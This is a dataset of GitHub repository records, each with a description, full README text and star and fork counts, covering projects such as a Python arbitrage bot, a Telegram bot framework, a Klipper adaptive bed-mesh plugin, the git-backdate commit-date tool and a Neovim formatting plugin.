full_name
stringlengths
10
67
url
stringlengths
29
86
description
stringlengths
3
347
readme
stringlengths
0
162k
stars
int64
10
3.1k
forks
int64
0
1.51k
solidquant/whack-a-mole
https://github.com/solidquant/whack-a-mole
CEX-DEX arbitrage bot written in pure Python
# Whack-A-Mole <p align="center"> <img src = "https://github.com/solidquant/whack-a-mole/assets/134243834/841a91df-728b-489b-b4af-4af948c03c35" width="450px"> </p> The image is of Dugtrio from Pokemon. ### What the heck? Whack-A-Mole is a CEX-DEX arbitrage bot written in Python. Arbitrage strategies are like the global Whack-A-Mole game played in parallel. Multiple players participate to find the mole that pops up, and jump to capture that opportunity. Who knows who'll win... What we know for certain is that you'll need a fast pair of eyes on the market at all times, and an extra fast execution engine to capture the moment without latency. Will our beloved Python be able to accomplish this? We'll see 😎 ### Example Strategy #1: DEX arbitrage The **main** branch is likely to go through a lot of changes, so to run an example that runs without breaking, you should switch to the **examples/strategy/dex_arb_base** branch before running **main.py**. Run: ``` git checkout examples/strategy/dex_arb_base ``` --- Check out my blog post describing in detail what this project attempts to do, and how you can use it. [Go to blog 👉](https://medium.com/@solidquant/how-i-built-my-first-mev-arbitrage-bot-introducing-whack-a-mole-66d91657152e) --- ⚡️ For readers that want to talk about MEV and any other quant related stuff with people, please join my Discord! There’s currently no one on the Discord server, so it’s not too active yet, but I hope to meet new people there! 🌎🪐 https://discord.gg/jjTa8vkP
12
5
ZhaiSoul/Steam-Liteloader
https://github.com/ZhaiSoul/Steam-Liteloader
一个轻量化的Steam UI 模组加载器
# Steam-Liteloader 一个轻量化的Steam UI 模组加载器 # 如何使用 将项目clone下来后,解压到Steam\steamui目录下即可使用 # 如何开发插件 待定,目前正在完善基本框架 # 未来计划 未来将制作插件管理工具以及插件平台,目前正在解决安全性的问题。 # 如何参与开发 加入QQ群:857193118,与群主联系即可。
39
0
verytinydever/BlockchainApp-Solidity-SmartContracts
https://github.com/verytinydever/BlockchainApp-Solidity-SmartContracts
null
# Online-Shopping-System
10
0
long39ng/listviewerlite
https://github.com/long39ng/listviewerlite
View nested lists in R interactively using only HTML and CSS
<!-- README.md is generated from README.Rmd. Please edit that file --> # listviewerlite <!-- badges: start --> <!-- badges: end --> listviewerlite provides a single function `listview()`, which creates a collapsible tree view of R lists using only HTML and CSS, without the need for JavaScript. ## Installation You can install the development version of listviewerlite from [GitHub](https://github.com/) with: ``` r # install.packages("devtools") devtools::install_github("long39ng/listviewerlite") ``` ## Example ``` r library(listviewerlite) x <- list( list(id = "a", val = 2), list( id = "b", val = 1, children = list( list(id = "b1", val = 2.5), list( id = "b2", val = 8, children = list( list(id = "b21", val = 4) ) ) ) ), list( id = "c", val = 8, children = list( list(id = "c1"), list(id = "c2", val = 1) ) ) ) listview(x) ``` <img src="man/figures/preview.gif" width="480" /> ## Acknowledgements This package is inspired by [{listviewer}](https://github.com/timelyportfolio/listviewer), which wraps the JavaScript libraries [jsoneditor](https://github.com/josdejong/jsoneditor) and [react-json-view](https://github.com/mac-s-g/react-json-view). The implementation of the `listview()` function is inspired by `utils::str()` and `lobstr::tree()`. The custom CSS properties for the collapsible tree view are copied and modified from the [blog post by Kate Rose Morley](https://iamkate.com/code/tree-views/).
15
0
lifeisboringsoprogramming/sd-webui-xldemo-txt2img
https://github.com/lifeisboringsoprogramming/sd-webui-xldemo-txt2img
Stable Diffusion XL 0.9 Demo webui extension
# Stable Diffusion XL 0.9 txt2img webui extension <img src="images/webui.png"> A custom extension for [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) that demo the SDXL 0.9 txt2img features # Tested environment * GPU: RTX 3060 12G VRAM * OS: Ubuntu 20.04.4 LTS, Windows 10 * RAM: 64G * Automatic1111 WebUI version: v1.4.0 * python: 3.10.9 * torch: 2.0.1+cu118 * xformers: 0.0.20 * gradio: 3.32.0 * checkpoint: 20af92d769 # Overview * This project allows users to do txt2img using the SDXL 0.9 base checkpoint * Refine image using SDXL 0.9 refiner checkpoint * Setting samplers * Setting sampling steps * Setting image width and height * Setting batch size * Setting CFG Scale * Setting seed * Reuse seed * Use refiner * Setting refiner strength * Send to img2img * Send to inpaint * Send to extras # Tutorial There is a video to show how to use the extension [![Introducing Stable Diffusion XL 0.9 txt2img AUTOMATIC1111 webui extension](https://img.youtube.com/vi/iF4w7gFDaYM/sddefault.jpg)](https://www.youtube.com/watch?v=iF4w7gFDaYM) # Stable Diffusion extension This project can be run as a stable Diffusion extension inside the Stable Diffusion WebUI. ## Installation for stable Diffusion extension * Copy and paste `https://github.com/lifeisboringsoprogramming/sd-webui-xldemo-txt2img.git` to URL for extension's git repository * Press Install button * Apply and restart UI when finished installing <img src="images/webui-install.png" /> # Samplers mapping |Sampler name|Diffusers schedulers class| |---|---| |dpmsolver_multistep|diffusers.schedulers.scheduling_dpmsolver_multistep.DPMSolverMultistepScheduler| |deis_multistep|diffusers.schedulers.scheduling_deis_multistep.DEISMultistepScheduler| |unipc_multistep|diffusers.schedulers.scheduling_unipc_multistep.UniPCMultistepScheduler| |k_dpm_2_ancestral_discrete|diffusers.schedulers.scheduling_k_dpm_2_ancestral_discrete.KDPM2AncestralDiscreteScheduler| |ddim|diffusers.schedulers.scheduling_ddim.DDIMScheduler| |dpmsolver_singlestep|diffusers.schedulers.scheduling_dpmsolver_singlestep.DPMSolverSinglestepScheduler| |euler_ancestral_discrete|diffusers.schedulers.scheduling_euler_ancestral_discrete.EulerAncestralDiscreteScheduler| |ddpm|diffusers.schedulers.scheduling_ddpm.DDPMScheduler| |euler_discrete|diffusers.schedulers.scheduling_euler_discrete.EulerDiscreteScheduler| |k_dpm_2_discrete|diffusers.schedulers.scheduling_k_dpm_2_discrete.KDPM2DiscreteScheduler| |pndm|diffusers.schedulers.scheduling_pndm.PNDMScheduler| |dpmsolver_sde|diffusers.schedulers.scheduling_dpmsolver_sde.DPMSolverSDEScheduler| |lms_discrete|diffusers.schedulers.scheduling_lms_discrete.LMSDiscreteScheduler| |heun_discrete|diffusers.schedulers.scheduling_heun_discrete.HeunDiscreteScheduler| # Limitations * this extension does not work with other extension like control net * this extension does not work with LoRA, textual inversion embeddings, etc # YouTube Channel Please subscribe to my YouTube channel, thank you very much. [https://bit.ly/3odzTKX](https://bit.ly/3odzTKX) # Patreon ☕️ Please consider to support me in Patreon 🍻 [https://www.patreon.com/lifeisboringsoprogramming](https://www.patreon.com/lifeisboringsoprogramming)
187
23
GineTik/Telegramper-TelegramFramework
https://github.com/GineTik/Telegramper-TelegramFramework
Telegramper is the Telegram.Framework, which is similar to ASP.Net Core. It contains services, middleware, configuration, controllers (executors), and more.
# Telegramper It is framework similar to a ASP.Net Core. Framework contains services, middlewares, configuration, controllers(executors) and other. > The framework is under development, so unexpected errors, changes in functionality, and names are possible! I would be grateful if you could report any bugs or functionality you need. ## Learn more about the framework 1. [About UpdateContext (similar to HttpContext)](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/TelegramBotApplication/Context) 1. [Configuration bot in Program.cs (Services, Middlewares, etc.)](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/TelegramBotApplication) 1. [Executors and attributes](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/Executors) 1. [Session](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/Sessions) ### Chapters coming soon - Dialog - Examples of projects written on the Telegramper framework ## Quick start ```cs internal class Program { static void Main(string[] args) { var builder = new BotApplicationBuilder(); builder.ConfigureApiKey("your api key"); builder.ReceiverOptions.ConfigureAllowedUpdates(UpdateType.Message, UpdateType.CallbackQuery); // default is UpdateType.Message builder.Services.AddExecutors(); // identical to the controller in ASP.Net Core var app = builder.Build(); app.UseExecutors(); app.RunPolling(); // webhooks are not implemented, but in the future you will be able to, for example, change polling to webhooks and vice versa } } public class BasicExecutor : Executor { [TargetCommands] // identical to [TargetCommands("start")] public async Task Start() { var sender = UpdateContext.User.ToString(); await Client.SendTextMessageAsync($"You are {sender}"); // send a text response } [TargetCommands("echo, command2")] [EmptyParameterSeparator] // remove separator, by default is space(" ") public async Task Echo(string phrase) // more about the parameters later { await Client.SendTextMessageAsync(phrase); } } ```
17
1
blackav/smart-home-binary
https://github.com/blackav/smart-home-binary
Smart-home problem demo server binary releases
# smart-home-binary Демо-сервер для задачи "умный дом" ## Запуск Перед запуском в Linux или MacOS убедитесь, что файл имеет права на исполнение. Установить их можно с помощью команды: ``` chmod +x FILE ``` Всегда используйте самую последнюю версию демо-сервера. Чтобы посмотреть список доступных опций программы используйте опцию `--help`. ## Запуск в режиме сервера Для запуска в режиме сервера используется опция `-s`: ``` ./smarthome -s ``` Если вы работаете в windows, не указывайте `./` перед командой. Выполняйте команду из командной оболочки, например, `cmd.exe`. ``` smarthome.exe -s ``` Обратите внимание, что имя файла при скачивании содержит название операционной системы, процессора и версию программы. Либо переименуйте скачанный файл, либо измените строку запуска соответствующим образом. Дополнительно при запуске в режиме сервера можно указать следующие опции: * `-p PORT` - номер порта, на котором сервер будет ожидать подключения. По умолчанию используется порт 9998. * `-0 TIME` - начальное модельное время для симуляции в формате `YYYY-MM-DDThh:mm:ss`, например, `1984-04-01T13:00:00`. По умолчанию - текущее астрономическое время, округленное до секунд. * `-1 DUR` - продолжительность моделирования, по умолчанию 1 час. * `-S SCENARIO` - запустить сценарий с указанным номером. Сценарии описаны далее. * `-V` - выводить принятые и отправленные пакеты в JSON-формате. Если запуск был успешен, демо-сервер будет ожидать подключения на указанном порту. Проверить это можно, например, с помощью `curl` ``` curl -H POST -d "" localhost:9998 ``` В ответ вы должны получить закодированную в base64 строку с сообщением с начальным модельным временем. Ответ сервера может выглядеть примерно так: ``` DbMG_38BBgaI0Kv6kzGK ``` ## Сценарии работы Версия 0.2.0 поддерживает два сценария работы. ### Сценарий 1 В этом сценарии в сети находится единственное устройство - таймер с именем `TIMER01`. Таймер шлёт сообщения о текущем времени каждые 100мс модельного времени. ### Сценарий 2 В этом сценарии в сети находится таймер `TIMER01`, лампа `LAMP02` и выключатель `SWITCH03`, коммутированный с лампой. Выключатель изначально находится в состоянии "выключен" и периодически меняет свое состояние. Таймер шлет сообщения о текущем времени каждые 100мс модельного времени. ## Кодирование и декодирование пакетов Демо-сервер может использоваться как утилита для кодирования и декодирования пакетов. Обратите внимание, что JSON-формат используется только для отладочных целей. По сети передаются пакеты в бинарном формате, закодированные в Base64. Опция `-B` выполняет декодирование пакета из base64 в JSON-форму, например, если выполнить из командной строки Unix команду ``` echo DbMG_38BBgaI0Kv6kzGK | ./smarthome -B ``` на стандартный поток вывода будет напечатано ``` [ { "length": 13, "payload": { "src": 819, "dst": 16383, "serial": 1, "dev_type": 6, "cmd": 6, "cmd_body": { "timestamp": 1688984021000 } }, "crc8": 138 } ] ``` Опция `-J` выполняет преобразование из JSON-представления в base64-представления для отправки. Например, если запустить из командной строки команду ``` ./smarthome -J ``` и на стандартном потоке ввода ввести ``` [ { "length": 13, "payload": { "src": 819, "dst": 16383, "serial": 1, "dev_type": 6, "cmd": 6, "cmd_body": { "timestamp": 1688984021000 } }, "crc8": 138 } ] ``` на стандартный поток вывода будет напечатано ``` DbMG_38BBgaI0Kv6kzGK ``` Опция `-K` выполняет преобразование из JSON-представления в бинарное представление. Так можно посмотреть, как представляется пакет в бинарной форме до его кодирования в Base64. Например, если запустить из командной строки команду ``` ./smarthome -K | hexdump -C ``` и на стандартном потоке ввода ввести ``` [ { "length": 13, "payload": { "src": 819, "dst": 16383, "serial": 1, "dev_type": 6, "cmd": 6, "cmd_body": { "timestamp": 1688984021000 } }, "crc8": 138 } ] ``` на стандартный поток вывода будет напечатано ``` 00000000 0d b3 06 ff 7f 01 06 06 88 d0 ab fa 93 31 8a |.............1.| ``` Внимание! Команды даны в предположении, что вы используете Linux или MacOS. В windows соответствующие команды могут быть другими. ## Примеры пакетов Ниже приведены примеры пакетов в base64 для всех возможных пар из типа устройства и команды. * SmartHub, WHOISHERE (1, 1): `DAH_fwEBAQVIVUIwMeE` * SmartHub, IAMHERE (1, 2): `DAH_fwIBAgVIVUIwMak` * EnvSensor, WHOISHERE (2, 1): `OAL_fwMCAQhTRU5TT1IwMQ8EDGQGT1RIRVIxD7AJBk9USEVSMgCsjQYGT1RIRVIzCAAGT1RIRVI03Q` * EnvSensor, IAMHERE (2, 2): `OAL_fwQCAghTRU5TT1IwMQ8EDGQGT1RIRVIxD7AJBk9USEVSMgCsjQYGT1RIRVIzCAAGT1RIRVI09w` * EnvSensor, GETSTATUS (2, 3): `BQECBQIDew` * EnvSensor, STATUS (2, 4): `EQIBBgIEBKUB4AfUjgaMjfILrw` * Switch, WHOISHERE (3, 1): `IgP_fwcDAQhTV0lUQ0gwMQMFREVWMDEFREVWMDIFREVWMDO1` * Switch, IAMHERE (3, 2): `IgP_fwgDAghTV0lUQ0gwMQMFREVWMDEFREVWMDIFREVWMDMo` * Switch, GETSTATUS (3, 3): `BQEDCQMDoA` * Switch, STATUS (3, 4): `BgMBCgMEAac` * Lamp, WHOISHERE (4, 1): `DQT_fwsEAQZMQU1QMDG8` * Lamp, IAMHERE (4, 2): `DQT_fwwEAgZMQU1QMDGU` * Lamp, GETSTATUS (4, 3): `BQEEDQQDqw` * Lamp, STATUS (4, 4): `BgQBDgQEAaw` * Lamp, SETSTATUS (4, 5): `BgEEDwQFAeE` * Socket, WHOISHERE (5, 1): `DwX_fxAFAQhTT0NLRVQwMQ4` * Socket, IAMHERE (5, 2): `DwX_fxEFAghTT0NLRVQwMc0` * Socket, GETSTATUS (5, 3): `BQEFEgUD5A` * Socket, STATUS (5, 4): `BgUBEwUEAQ8` * Socket, SETSTATUS (5, 5): `BgEFFAUFAQc` * Clock, IAMHERE (6, 2): `Dgb_fxUGAgdDTE9DSzAxsw` * Clock, TICK (6, 6): `DAb_fxgGBpabldu2NNM`
40
9
DevMiser/Bird-Sweeper
https://github.com/DevMiser/Bird-Sweeper
The Bird Sweeper chases birds away but does not hurt them. It is an effective and humane bird deterrent.
# The Bird-Sweeper <img width="461" alt="B1" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/0fca9c41-a781-43c1-8dc8-e48aa376c733"> <img width="435" alt="B2" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/3d88019a-1909-44f9-a8c5-d4fc0e12d587"> <img width="474" alt="B3" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/d7889414-86d7-4b46-9d6d-e91df5bd40c8"> <img width="473" alt="B4" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/2ee469ef-5b20-4b62-8d9f-f6aa6f92c063">
15
1
xinsblog/chatglm-tiny
https://github.com/xinsblog/chatglm-tiny
从头开始训练一个chatglm小模型
* [chatglm-tiny: 从头开始训练一个chatglm小模型](https://zhuanlan.zhihu.com/p/642355086)
14
0
eamars/klipper_adaptive_bed_mesh
https://github.com/eamars/klipper_adaptive_bed_mesh
An Python plugin enabling the bed mesh based on the printed part.
Klipper Adaptive Bed Mesh === [中文版](readme_zh_cn.md) # What is it? The *Adaptive Bed Mesh* plugin is designed to generate the bed mesh parameter based on the sliced part dynamically. With finer bed mesh density around printed parts you can achieve better accuracy and lesser time spent on probing. ![bed_mesh_path](resources/bed_mesh_path.png) The *Adaptive Bed Mesh* plugin is inspired from multiple open source project - [Klipper mesh on print area only install guide](https://gist.github.com/ChipCE/95fdbd3c2f3a064397f9610f915f7d02) - [Klipper Adaptive meshing & Purging](https://github.com/kyleisah/Klipper-Adaptive-Meshing-Purging) ## Features The *Adaptive Bed Mesh* plugin supports 3 operating modes. By default, the below list is also the precedence of the operation. 1. First layer min/max provided by the slicer. 2. Object shapes detection by Klipper Exclude Object. 3. Object shapes detection by GCode analysis. If all above modes are failed then the *Adaptive Bed Mesh* will fall back to the default full bed mesh configuration. ### First layer min/max provided by the slicer Most slicer can export the min (closest to 0,0) and max coordinate of the first layer extrude motions. Below are syntax for few famous slicers. #### Orca Slicer / Super Slicer / Prusa Slicer ADAPTIVE_BED_MESH_CALIBRATE AREA_START={first_layer_print_min[0]},{first_layer_print_min[1]} AREA_END={first_layer_print_max[0]},{first_layer_print_max[1]} #### Cura ADAPTIVE_BED_MESH_CALIBRATE AREA_START=%MINX%,%MINY% AREA_END=%MAXX%,%MAXY% Copied from [Klipper mesh on print area only install guide](https://gist.github.com/ChipCE/95fdbd3c2f3a064397f9610f915f7d02) > *(Cura slicer plugin) To make the macro to work in Cura slicer, you need to install the [post process plugin by frankbags](https://raw.githubusercontent.com/ChipCE/Slicer-profile/master/cura-slicer/scripts/KlipperPrintArea.py) > - In cura menu Help -> Show configuration folder. > - Copy the python script from the above link in to scripts folder. > - Restart Cura > - In cura menu Extensions -> Post processing -> Modify G-Code and select Klipper print area mesh ### Object shapes detection by Klipper Exclude Object. The [Klipper Exclude Object](https://www.klipper3d.org/Exclude_Object.html) collects the printed part boundary for object exclude functionality. Subject to the Slicer, the printed part boundary can be a simple boundary box, or complicated hull of the object geometry. There is no special parameter to activate the object shape detection based bed mesh. If the Exclude Object feature is [enabled from Klipper](https://www.klipper3d.org/Config_Reference.html#exclude_object) and your slicer supports such feature, then the bed mesh area will be calculated based on all registered boundaries. ### Object shapes detection by GCode analysis As the last line of defense, when all above detection algorithms are failing (or disabled), the object boundaries shall be determined by the GCode analysis. The GCode analysis will evaluate all extrude moves (G0, G1, G2, G3) and create the object boundary by layers. It will evaluate all layers unless the [mesh fade](https://www.klipper3d.org/Bed_Mesh.html#mesh-fade) is configured. For example, with the below `[bed_mesh]` section, the GCode analysis will stop at 10mm from the bed while the klipper stops the bed mesh compensation at the same height. [bed_mesh] ... fade_start: 1 fade_end: 10 fade_target: 0 # Configurations ## [bed_mesh] The *Adaptive Bed Mesh* will use values from `[bed_mesh]` sections. Below are required attributes. Please make sure the min/max coordinates are within the safe probing boundaries. [bed_mesh] # The mesh start coordinate. The adaptive bed mesh will not generate points smaller than this coordinate. mesh_min: 20, 20 # The maximum coordinate of the bed mesh. The adapter bed mesh will not generate points greater than this coordinate. # Note: This is not necessarily the last point of the probing sequence. mesh_max: 230,230 # (Optional) The Z height in which fade should complete fade_end: 10 > **_NOTE:_** The `relative_reference_index` is now [deprecated](https://www.klipper3d.org/Bed_Mesh.html#the-deprecated-relative_reference_index). > **_NOTE:_** The `zero_reference_position` will be overwritten by the plugin so you don't need to configure it from the `[bed_mesh]` > section. ## [virtual_sdcard] The *Adaptive Bed Mesh* will use values from `[virtual_sdcard]` sections. Below are required attributes. Usually `[virtual_sdcard]` is defined under the Mainsail or Fluidd configuration. [virtual_sdcard] path: ~/printer_data/gcodes ## [adaptive_bed_mesh] The `[adaptive_bed_mesh]` need to be declared under `printer.cfg`, after the `[exclude_object]` and `[virtual_sdcard]`. [adaptive_bed_mesh] arc_segments: 80 # (Optional) The number of segments for G2/3 to be decoded into linar motion. mesh_area_clearance: 5 # (Optional) Expand the mesh area outside of the printed area in mm. max_probe_horizontal_distance: 50 # (Optional) Maximum distance between two horizontal probe points in mm. max_probe_vertical_distance: 50 # (Optional) Maximum distance between two vertical probe points in mm. use_relative_reference_index: False # (Optional) For older Klipper (< 0.11.2xx), the `use_relative_reference_index` is used to determine the center point. This is not required for the newer release. # (Optional) Enable/Disable detection algorithm on demand disable_slicer_min_max_boundary_detection: False disable_exclude_object_boundary_detection: False disable_gcode_analysis_boundary_detection: False ## How to determine the maximum horizontal/vertical probe distances The *Adaptive Bed Mesh* uses probe distance instead number of points to be probed to achieve better probe density consistency with respect to parts in different sizes. To calculate the optimal probe distance, you can use the reference number of points for a full printed bed as an example. For a 250mm by 250mm square heater bed, a 5x5 mesh is generally sufficient. The maximum horizontal and vertical probe distance can calculate by probe_distance = 250 / 5 = 50mm # Usage Call `ADAPTIVE_BED_MESH_CALIBREATE` as the part of `PRINT_START` macro is all you need. Example: [gcode_macro PRINT_START] gcode: ... ADAPTIVE_BED_MESH_CALIBRATE ... > **_NOTE:_** If you're using the [Automatic Z-Calibration plugin](https://github.com/protoloft/klipper_z_calibration) > then you need to ensure the `ADAPTIVE_BED_MESH_CALIBRATE` is called prior to `CALIBRATE_Z`. # Install via Moonraker Clone the repository to the home directory cd ~ git clone https://github.com/eamars/klipper_adaptive_bed_mesh.git You need to manually install the plugin for the first time. It will prompt for password to restart the Klipper process. source klipper_adaptive_bed_mesh/install.sh Then copy the below block into the moonraker.conf to allow automatic update. [update_manager client klipper_adaptive_bed_mesh] type: git_repo primary_branch: main path: ~/klipper_adaptive_bed_mesh origin: https://github.com/eamars/klipper_adaptive_bed_mesh.git install_script: install.sh # Contribution Contributions are welcome. However before making new pull requests please make sure the feature passes the unit test in `test_adaptive_bed_mesh.py` and add new if necessary.
13
1
dekdevy/idm
https://github.com/dekdevy/idm
Tag images, batch resize, export, string interpolated descriptions + common image dataset utilities
## Image Dataset Manager #### Current state: Early Testing This tool allows you to conveniently load many images, tag them with information, batch export, do image operations, cropping, etc. This can be useful for machine learning or gamedev. ![Screenshot](https://github.com/dekdevy/idm/blob/main/screenshot.png?raw=true) ## Current Features - Tagging of single and multiple images at the same time - Tag groups with custom join strings, pre- and suffix strings - Image descriptions based on custom tag interpolation (`"Photo of a {type} with {color} {feature}"`) - Exporting with batch resize and cropping, image descriptions into `".txt"` - Filtering of images based on tags, filenames, group tag counts - Flattening of alpha channels, replacing alpha with color ## Planned Features - Auto toggle of tags based on file paths - Export path string interpolation (exporting to `/{type}/0.png` etc) ## Development Requires Node and Rust, made with [Tauri](https://tauri.app/). ``` npm install npm run tauri dev ```
15
1
rixx/git-backdate
https://github.com/rixx/git-backdate
Backdate a commit or range of commit to a date or range of dates.
> Who controls the past, controls the future: who controls the present, controls the past. The mutability of the past > is the central tenet of Ingsoc. Past events, it is argued, have no existence, but survive only in written records and > in human memories. The past is whatever the records and the memories agree upon. And since ~~the Party~~ git is in > full control of all records and in equally full control of the minds of its members, it follows that the past is > whatever ~~the Party~~ git chooses to make it. *– Linus Torvalds, probably* # git-backdate git-backdate helps you to change the date of one or multiple commits to a new date or a range of dates. ## Features - Understands business hours, and that you might want to have your commits placed inside or outside of them. - Commits are randomly distributed within the given time window, while retaining their order. No 12:34:56 for you anymore! - Given a single commit, git-backdate will automatically assume that you want to rebase the entire range from there to your current `HEAD`. - Sets author date and committer date so you don't have to look up how to set both of them every time you fudge a commit timestamp. - Python, but with near-zero dependencies (see below; only `sed` and `date`), so you can just download and run it without Python package management making you sad. ## Usage Backdate all your unpushed commits to the last three days, and only during business hours: ```shell git backdate origin/main "3 days ago..today" --business-hours ``` Backdate only some commits to have happened outside of business hours: ```shell git backdate 11abe2..3d13f 2023-07-10 --no-business-hours ``` Backdate only the current commit to a human readable time: ```shell git backdate HEAD "5 hours ago" ``` ## Installation Drop the `git-backdate` file somewhere in your `PATH` or wherever you like: ```shell curl https://raw.githubusercontent.com/rixx/git-backdate/main/git-backdate > git-backdate chmod +x git-backdate ``` The magic of git will now let you use `git backdate` as a command. ### Requirements `git-backdate` tries to only require git and Python. However, it also relies on - `sed` if you want to backdate more than the most recent commit <sup>for perfectly fine reasons, don't worry about it</sup> - `date` if you want to pass date descriptions like "last Friday" or "2 weeks ago" ## … why. I started various versions of this in uni, when I did my assignments last minute and wanted to appear as if I had my life together. I still sometimes use it like that (especially to make the 3am commits look less deranged), but there have been new and surprising use cases. Most of these have been contributed by friends and do not reflect on me, nor do they represent legal or career advice: - Did work things outside work hours, but don't want to nudge your workplace culture into everybody working at all times. - Worked an entire weekend for a client, but don't want them to get used to it and start calling you on every weekend. - Made some fixes during a boring meeting, but pretended to pay attention throughout. - Want to confuse your coworkers by making it look like you were committing code while doing a company-wide presentation. - <your reason here, please share with the class> ## Caveats Commit dates are part of a commit's metadata. Changing a commit's date changes its hash. You very likely only want to run `git backdate` on commits that you have not pushed yet, because otherwise you would have to `--force` push your new history. I know, I know, you're using `--force-with-lease`, so you won't destroy data, but your collaborators or integrations will still be somewhat miffed. Also, obviously, use with care and compassion.
194
7
appwrite/dynamic-links
https://github.com/appwrite/dynamic-links
Implement Dynamic Links with Appwrite Functions!
# Dynamic Link Handler ![Join Discord](https://img.shields.io/discord/564160730845151244) ## **Pre-release Notice** This function dependent on Appwrite 1.4. Please note, as of the writing of this document, this version of Appwrite is not publicly available. ## Overview Dynamic links are links that redirect users to different locations based on their device, operating system, or other factors. For example, a link to a mobile app can redirect users to the Google Play Store or Apple App Store depending on their device. Dynamic links can also be used to redirect users to Deep Links - a specific page within a Mobile app, such as a user profile page. ### Web https://github.com/appwrite/dynamic-links/assets/29069505/209bc34e-6a43-476c-b2f0-697bab2c54de ### iOS https://github.com/appwrite/dynamic-links/assets/29069505/7cac33ad-acc0-406f-9dae-c1d0359dd356 ### Android https://github.com/appwrite/dynamic-links/assets/29069505/72af1583-9e8c-4798-bbd6-40706ab8d40e ## Configuration The service can be configured through the `CONFIG` environment variable in a JSON string format. Each object in the `CONFIG` array is expected to have a `path` and `targets`. To illustrate, here are example settings for the `CONFIG` environment variable with respective use cases: ### 1. Mobile vs. Desktop Redirection ```json [ { "path": "/test", "targets": { "mobile": "https://m.example.com/test", "desktop": "https://www.example.com/test", "default": "https://www.example.com/test" } } ] ``` In this example, requests to the `/test` path will redirect mobile users to `https://m.example.com/test`, while desktop users are redirected to `https://www.example.com/test`. Users with unrecognized or non-classified user-agents will be directed to the default URL `https://www.example.com/test`. ### 2. Operating System-Specific Redirection ```json [ { "path": "/app", "targets": { "android": "https://play.google.com/store/apps/details?id=com.example", "ios": "https://apps.apple.com/app/example/id123456", "default": "https://www.example.com/app" } } ] ``` In this scenario, requests to the `/app` path will redirect Android users to the Google Play store and iOS users to the Apple App Store, while all other users are directed to the general application page. ### 3. Deep Link Redirection with Fallback Option ```json [ { "path": "/deeplink", "targets": { "android": { "appName": "twitter", "appPackage": "com.twitter.android", "appPath": "user?screen_name=appwrite", "fallback": "https://play.google.com/store/apps/details?id=com.twitter.android" }, "ios": { "appName": "twitter", "appPath": "user?screen_name=appwrite", "fallback": "https://apps.apple.com/us/app/twitter/id333903271" }, "default": "https://twitter.com/appwrite" } } ] ``` In this case, requests to the `/deeplink` path will redirect Android and iOS users to a specific part of an app, if installed. If the app is not installed (the deep link fails), they will be directed to their respective app stores. All other users will be redirected to a webpage containing similar information. ## Setting Up Deep Links ### Android For Android, add the following to your `AndroidManifest.xml`: ```xml <activity android:name="com.example.MainActivity" android:label="@string/app_name" android:launchMode="singleTask" android:theme="@style/AppTheme.NoActionBar"> <intent-filter android:label="@string/app_name"> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> <category android:name="android.intent.category.BROWSABLE" /> <!-- Accepts URIs that begin with YOUR_SCHEME://YOUR_HOST --> <data android:host="YOUR_HOST" android:scheme="YOUR_SCHEME" /> </intent-filter> </activity> ``` Also, add the following to your `MainActivity.java`: ```java @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); // Get the intent that started this activity Intent intent = getIntent(); Uri data = intent.getData(); // Verify that the intent has the correct action and data if (Intent.ACTION_VIEW.equals(intent.getAction()) && data != null) { String path = data.getPath(); String query = data.getQuery(); String screenName = query.substring(query.indexOf("=") + 1); String url = "https://twitter.com/" + screenName; // Redirect to the correct screen Intent redirect = new Intent(Intent.ACTION_VIEW, Uri.parse(url)); startActivity(redirect); } } ``` More information on deep linking for Android can be found [on the Android Developers website](https://developer.android.com/training/app-links/deep-linking). ### iOS For iOS, add the following to your `Info.plist` file: ```xml <array> <dict> <key>CFBundleURLSchemes</key> <array> <string>YOUR_SCHEME</string> </array> <key>CFBundleURLName</key> <string>YOUR_HOST</string> </dict> </array> ``` Also, in your `AppDelegate.swift` file, add the following to handle deep links: ```swift func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool { guard userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL, let components = NSURLComponents(url: url, resolvingAgainstBaseURL: true) else { return false } let path = components.path, let query = components.query, let screenName = query.substring(from: query.index(query.startIndex, offsetBy: query.index(of: "=")! + 1)) let url = "https://twitter.com/\(screenName)" // Redirect to the correct screen if let url = URL(string: url) { let svc = SFSafariViewController(url: url) self.window?.rootViewController?.present(svc, animated: true, completion: nil) } return true } ``` For further details on deep linking in iOS, refer to [Apple's official documentation](https://developer.apple.com/documentation/uikit/inter-process_communication/allowing_apps_and_websites_to_link_to_your_content). ## License This project is licensed under The MIT License (MIT). For more information, visit [http://www.opensource.org/licenses/mit-license.php](http://www.opensource.org/licenses/mit-license.php).
44
0
niuiic/format.nvim
https://github.com/niuiic/format.nvim
An asynchronous, multitasking, and highly configurable formatting plugin.
# format.nvim An asynchronous, multitasking, and highly configurable formatting plugin. ## Dependencies - [niuiic/core.nvim](https://github.com/niuiic/core.nvim) ## Features ### Format entire file Call `require("format").format()`. The plugin only modifies changed parts, thus the buffer's folding, highlighting, etc, will not be affected. ### Format range Call `require("format").format_range()`. Only format selected area. Only work in `v` mode, not `V` or `C-v`. <img src="https://github.com/niuiic/assets/blob/main/format.nvim/format-range.gif" /> ### Multitasking 1. What is multitasking? That means you can use more than one tools to "format" code at one time. 2. Why do you need this feature? The most common need, if you are writing js/ts, `prettier` may cause eslint error, if `eslint fix` is called after `prettier`, everything goes well. ## How it works 1. Copy buffer content into a temp file. 2. Apply commands to this file. 3. Read the file and write back to the buffer. 4. Remove the file. > Why create a temp file? > > This plugin is designed to apply various commands to the buffer. Some commands, like `cargo fix`, cannot work if file does not exist. ## Config See builtins at `lua/format/builtins`. > There are no much builtins, but you can add your favorite formatting tools easily, as long as you know how to format files with the command line. Default configuration here. > See the full configuration at `lua/format/static.lua` 